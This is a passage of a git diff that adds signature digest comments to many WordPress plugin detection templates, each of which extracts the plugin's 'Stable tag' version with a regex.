4b0a00483046022100c60b5fcccdd6aad52bbae17135e1dacb69e569d945c749677d69fd874e2df237022100d263f0daba36caf7c2cf20aca507eaeae1f1959a393b52a9b37cd2ec22e79a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..7916148fe1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022045a618e4fe6aa55b1517504a2b8f9c78a4e8fce8fc2150bd3958dc1f7a7ca6c602210085c760efa4a19a1830da5a8aedc7cb446a2c92057741b9b7b0c1f5be85f64771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..6d25b1f2c9 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022065b1c55878613adf197c5a38cf9b597d79772bf2104f7fd880b9e7936f7550c4022100d54fa1368a9e4e9b866c5c8678751276d5da54aea6c945ab1b7425b77195030c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..892bfc000f 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b55e6d1474214dbb20a01e03e8c2b630fe4d695f2dc6217285d12070435abd880221009ed15676978233220d0f1a3d6a901e59e93724c908b2e9f99e61cd06f5633f3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..ae32a9381e 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2ef628d5799ba58f5b4136997ec76036fd475b749dc8157acbd78b485ac6f1a02203b31c3e5f61b3178c0038d872f7fe1f7182888d6fa24348788eb5fad0b393e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..374d40fc5c 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220593700f048e2c5c555376dd0d0b45fb65af1bc83e7d73c1cdf06d18160b6c4a8022100a4b864b2afa65795778d2cb691a604021e9591da3ea93661948b95f2174c3a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..e54636bd7b 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220695952febe98d582c38653e33c55224f18920be1d4b4a6e5626f0fff50391bef022100c2ec3cec8cb03f57d8f43d3134f89c9a923ef494a8818dfd2d0bf4cf386fa452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..f17c1ef5a5 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220323191fccac58868863110536a70e27ccb350588562e5d7bd268f5c71be273c4022070db54dc112a37d1539ec6d1d4a4d0eb7ffe6d151df2c2dbb95575102991bd16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..84e2980c68 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098361ca34976142aaf8b0f54388aab772ccc7d04e60d6d0b50b84d60bb881b02022100b703a3a6e8a2320e3e12c335b078b6f03b2dc8ac96718967a40c31ad597df343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..4a8f1955e7 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee2cf16ea298c895527a109cb5fcb2c70f003c6b1a623f91daedc7781cced0c00221009c5a1b3bea6ebe0135f134c8ea4e67bf9711fde52f242aea7124f9837fd94cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..b082597e93 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220215e524ec2953b765de444dd1682a9f18de02fb7b1ae1bac3da8497e040d0b120221008a33839c470a19df4602ddcbf3a1369914f0dcb306bfb72ea59902348ae095fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..d280621d0b 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068f73edc75a4e4e93642a7b276813f6ff2352a0ae14068ad9176a7168c7b2bd2022100b177ac7de47a2d3e2ac7999ec8e595f41200b5c4b3d2e90cd28ca3330bbaa637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..d18be4e112 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f2f672457083e7d550104c4d5a0c282cf9a738c6f51ce2b6627d61a7b811b88022100f77dc7eb32cb5cc0fe39a6f3d65192a4b15bd9f8d507a7781056cde38de60c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..6713442606 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068517daf008e1173f851d9014e821ac0b2c2468025fe7037d00bf90c336023b1022100b5873588637e2426d3518e6a5902d925d843f2e76425180b1a30497e4c387a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..dba4615ebc 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220380b536dda0900bd3c274c1e8734baedd6cffa7bf7904a05fde1cb117865e96f0220662f6b5ebb66cef364613ef07576b20a2eb8b9e9896499ec6b4ebbb8fdeddf16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..469214b058 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200cdcad43ecb2dff07822a370e05758d47a780ac3733b7c68242e6ec6c66aad9f022100a11935aa9bf35edc690fa3a4edfa9179b52beadf38288ffd52ddc270a6dfe745:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..366a806546 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201450122a9c20434754ce5715feac4686244ee5597a3015b16f8e58c3c66e8b9502202e83dfd96bf93988e99b555a42fae337cdef925bbbfadfaf44d500b6ca90fe0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..6f31d89ca6 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cb2d48c2af556d0ab26c233467bab62ed8b74b258c36aceaa95c58dd0373edc502201e9c7b3c019b9d91b808289cef1664e5a1d66465d3f56a3e89ad3c3d6520a7b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..33ba5a4ed4 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b1a536798cb78955a9f0e97843e3ba734ec677e9b6f69a630f75ab6e1f99adad022034ba095e280379c9980e4b11568c2ea933192106ea3e1511e5059bc79ec66e74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..79872a1fb7 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009b1a98ea1169118f5166af7ad45f4181fc45742f07eb9ddc793088884fa896610221008acdefc76eb8dcf5bbff7f69de820c17f0e16725b51dcd46ff5e8c752bd85486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..7110235ae7 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210088fc98d609d5c6ebc3d092a1dfe80a95dd3b60ea4077cce208ee1358f87e747402200b8f44062b2461c8f75d045f9e3144dff516cf2c54a45abc9e647d4bcc323c5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..b00325eaba 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae4524c2faad1464526f663041a12c12600331b6f9d8f8a4cfd085d99ebc03c40221009b0882fe8e351fb28784280da89e8cc806d6daae92920665e30f23755771bd28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..9e0f3b9360 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e4b65cdb91ba9b9ef00b6bb2b19fe835dde90964171b0daf0541e478adac2c1022007796ca3bd49f0c586db9cde02f0fa5ebeb61d3ba74dadb7bc9c060763b0f42a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..d164794e19 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220389133d5dfa340f5705298a5c572c5cb6fd0d7d1f4935b65baa5a8599f50bad502207aa167ba5999169b12eb61061bcdbee70f1e98cce2f55015be270c8d9100dc37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..a9b7eeff0f 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021002403ebcb05e8fe09ff4246a19eedb208c5ae66c98f4cd4b021afa3e49965022050e906b0f19a8fe2b91b9f045512c51ca1fabab9b14403dfa5f77f54bf61d54a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..cf7baeeff6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8d277c62dab9df59f49ed2b658a56ad9fd78c146ae3dcd8e1e807c76be2a4a2022100fc2936b93fc8a973c04fd1e20c503db638ba5e2a685bdc4fb813dc01ebf22441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..b51dfe740d 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef8ceaa7e9e8f9f627cdcebc8e1e6b9a3f4a90b3e996c04a5c75ad9a3db8783a022100e782105afd6b9eb5cc35a4bf0a193b0c82d11f6a822a0f2c4ecfc57c507e6a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..82222048fd 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7b5ebb38120eb8d4a7b44a40d8e368c70d7c5db26c806116a60fa5566a4969802210082807149d4a5f166d48764372d601e9cba22b1be39ec340191a4f7a9b7f7eae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..b75c5861c9 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220173a20b2df30ce4e3e581047fa8a1b1b750b5e0c7baea9530f8aeea838634d2e022100f1617d240bc246d67aaf0bba84aa4948d5ba7d35363326273cef606c7f8a7676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..29bcc18d00 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201446f304900451fff7a87109ca7483135f2199a67b3809335910ada896c4c2d802207eb44bfabacf0f774f9c02f505f789183c4b83afd5cb6dae571f9a6869ddb398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..1474df9859 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3d3bf7149f5489459472af685f93f972e60c065d9d431bf064448d53d619be6022100dcde3a2f502962d471d8a6d2e7ea7ca95d6f4ef80ecab42b91db06e96cdde748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..9506e0f694 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3fe26472fba169f2cdc7804363dca0562b228141724f21c0032cf62d20305b5022100ae4993b3ee391d131ec0016857b204b43da68468b9a1538810efa34e28f4e651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..50dedc9495 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008599f0ac11c99c56be311e81e3c3b2997258bcf2584943c70c74b4fe2e2bb14f02206dde6e909a45c9d859c197ba078388c7fb129f9db6b20a7edda4c773b483c877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..9925ffd929 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210081f77f6a5b378edd2db6da75b8c5831bd22e89f799fefb0c2d5ae2cd0835ae56022054e3a302b33e6f7384d2779527038b1af0c871885489f9f72f5b4f727e2a3811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..36cf5df19e 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202033c9fa4b50825e467cf6052fa53aff2a9696b85cf2840660ef4ab1cd6883f3022100f7427caa9c7b3e628585aaa75804b4d47ed509d7ea6486ef960e4d713ae30316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..105141b591 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206fc9b3e5a3574b3734bb73499b0e95688fffd6cf4db490fd2d12f10e393135280220436a9f9b671a187cb9159878de550589336ca1394729078f2fbea2e3519d7e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..5bbd084e12 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb5fccb7adf2237f9edca0fddce4b681db37b3d4cbf8d48d066d057530ea2d81022026e736dfdece20c494cf55cc78e7ebf865ba42c2b0c0832a077efdc48720eab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..b41b658cfa 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008bfa4d112af1a4b036cedfb520dbaf17fe88180d4770d58ab1045af61f7191ff0220032c154afcf601df72ed0c3dfba90e6e9864c0eb642998ebb5d04714ac821f0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..57c64bb9de 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c8888d9589785224b4d64525c5b0064efd012efe3484a76abed48d0a4bd6b6802206eab42e5632c3836bc2b9d39bcbfb3ea34b8744c3504ec0eb7d214474c58b164:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..b873bd1df4 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e2f57489e3bb721b7d1ca7cfcbf79e046a08a5c329c66caeabaec6164aee7ffa02201e147a21d761050cc9efb9f967af28ab7196502b098929b704aab9df5c7561e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..07c5444aa7 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eafe593a7361439ab36ea3bf19f8d86d068c424a1c705b0ac7a17250ffa2abc1022100bf570977c046a7d66d8705c68160c8d2dd6b2000499545db33e0291dd6442d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..8fa3814502 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a025b7adfe4e6065210ec81a70291979c44a1e56cdddb3b943c24ca98d70724d0220691a5634de391db0328a3e2da127161bdc8474109f5d879de50959733b5b775a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..85966184aa 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204ff7e0f5783444b0c7728dc975a7cac85bab1bb4d4ccd5a85bc6bdb2cb4f666b022100b27f8a77c114dbafd4464e1b70a62f79129b28ed274984bb40eb6a636f10a1c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..cfd4176f81 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022038c7a1a5d6c255a44824669cd36fc9c56f96ac999e207e9d8de9a57dc037fadb0221008f44d4adfc83c1f1b2c542477fe7e2753f80033d4d569eecdac3471a966043a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..6e9725d6da 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd2866332540144fc61e6fa03c696f9b3bbfb83e51c1a25fde1dbce627e68fe402205fb382fd81b3e606b7451967e0efbe516f8d5366dc1e76630cadcc4d4526bcf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..568e1bd81a 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022647396110bba6e37807d6c91e86d4dccac27f0050ae0197d62c5c701a9206a0220706aac4cd949ae60d69a9bed2899c3e32a6bbb4719752ace93eab55776cbd182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..a6e8ec4edb 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fc3781b47341cef4d94441aa59ea37aa81c07a8f7412026db77de263f3b0af400221009292e41b3b9642455491a4f9196c05dd00e1cf6c9251437f8b03f8e09ef8e1d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..b3684caa70 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ 